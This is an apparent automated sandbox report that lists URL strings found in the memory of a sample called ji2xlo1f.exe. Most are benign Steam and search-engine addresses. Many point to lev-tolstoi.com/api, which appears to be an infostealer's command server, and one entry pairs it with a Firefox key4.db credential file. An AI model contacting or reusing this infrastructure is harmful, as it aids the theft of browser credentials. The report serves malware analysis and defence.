                Source: ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                Source: ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001695000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2491194547.0000000003D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: ji2xlo1f.exe, 00000001.00000003.2413647159.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457586316.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446024458.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2412079508.0000000003D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/%
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/A
                Source: ji2xlo1f.exe, 00000001.00000003.2506963341.00000000016F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Akys
                Source: ji2xlo1f.exe, 00000001.00000003.2507134468.0000000003D17000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457586316.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446024458.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000002.2585645002.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2492449171.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2491194547.0000000003D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/I
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/a
                Source: ji2xlo1f.exe, ji2xlo1f.exe, 00000001.00000002.2584910256.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000002.2584910256.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458550592.000000000169A000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483549945.000000000169A000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2507093985.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483549945.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2571494048.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2571541795.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: ji2xlo1f.exe, 00000001.00000003.2368050415.0000000003D20000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2368098826.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2368278967.0000000003D34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api0JBb
                Source: ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2506963341.00000000016F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiN#
                Source: ji2xlo1f.exe, 00000001.00000002.2584910256.00000000016E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiic
                Source: ji2xlo1f.exe, 00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apijson
                Source: ji2xlo1f.exe, 00000001.00000003.2483549945.00000000016D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apim
                Source: ji2xlo1f.exe, 00000001.00000003.2483549945.00000000016D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apix
                Source: ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                Source: ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/n#
                Source: ji2xlo1f.exe, 00000001.00000003.2491396441.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2506963341.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483290597.00000000016F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/qWU0rNf#
                Source: ji2xlo1f.exe, 00000001.00000003.2491396441.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483290597.00000000016F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/r
                Source: ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/rsF#
                Source: ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/v#
                Source: ji2xlo1f.exeString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: ji2xlo1f.exe, 00000001.00000002.2584910256.0000000001672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api2
                Source: ji2xlo1f.exe, 00000001.00000003.2571494048.00000000016E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api7hffxt.default-release/key4.dbPK
